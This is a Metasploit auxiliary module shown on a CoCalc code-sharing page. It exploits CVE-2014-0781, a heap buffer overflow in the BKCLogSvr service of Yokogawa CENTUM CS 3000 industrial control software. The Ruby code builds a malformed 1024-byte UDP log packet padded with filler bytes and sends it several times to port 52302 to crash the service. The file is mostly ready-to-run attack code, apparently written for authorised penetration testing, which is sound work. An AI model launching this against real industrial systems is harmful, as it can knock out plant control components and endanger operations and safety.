Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',

15
        'Description' => %q{

16
          This module abuses a buffer overflow vulnerability to trigger a Denial of Service

17
          of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability

18
          exists in the handling of malformed log packets, with an unexpected long level field.

19
          The root cause of the vulnerability is a combination of usage of uninitialized memory

20
          from the stack and a dangerous string copy. This module has been tested successfully

21
          on Yokogawa CENTUM CS 3000 R3.08.50.

22
        },

23
        'Author' => [

24
          'juan vazquez',

25
          'Redsadic <julian.vilas[at]gmail.com>'

26
        ],

27
        'References' => [

28
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],

29
          [ 'URL', 'https://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],

30
          [ 'CVE', '2014-0781']

31
        ],

32
        'DisclosureDate' => '2014-03-10',

33
        'Notes' => {

34
          'Stability' => [CRASH_SERVICE_DOWN],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        Opt::RPORT(52302),

44
        OptInt.new('RLIMIT', [true, 'Number of packets to send', 10])

45
      ]

46
    )

47
  end

48


49
  def run

50
    if datastore['RLIMIT'] < 2

51
      print_error('Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.')

52
      return

53
    end

54


55
    # Crash due to read bad memory

56
    test = [1024].pack('V')             # packet length

57
    test << 'AAAA'                      # Unknown

58
    test << "SOURCE\x00\x00"            # Source

59
    test << "\x00" * 8                  # Padding

60
    test << 'B' * (1024 - test.length)  # Level & Message coalesced

61


62
    connect_udp

63


64
    # Sending two consecutives packages is enough to

65
    # trigger the overflow and cause the DoS. But if

66
    # legit packets are processed by the server, between

67
    # the two malformed packages, overflow won't happen.

68
    # Unfortunately because of the usage of UDP and the

69
    # absence of answer, there isn't a reliable way to

70
    # check if the DoS condition has been triggered.

71
    print_status("Sending #{datastore['RLIMIT']} packets...")

72
    (1..datastore['RLIMIT']).each do |i|

73
      vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")

74
      udp_sock.put(test)

75
    end

76


77
    disconnect_udp

78
  end

79
end

80


81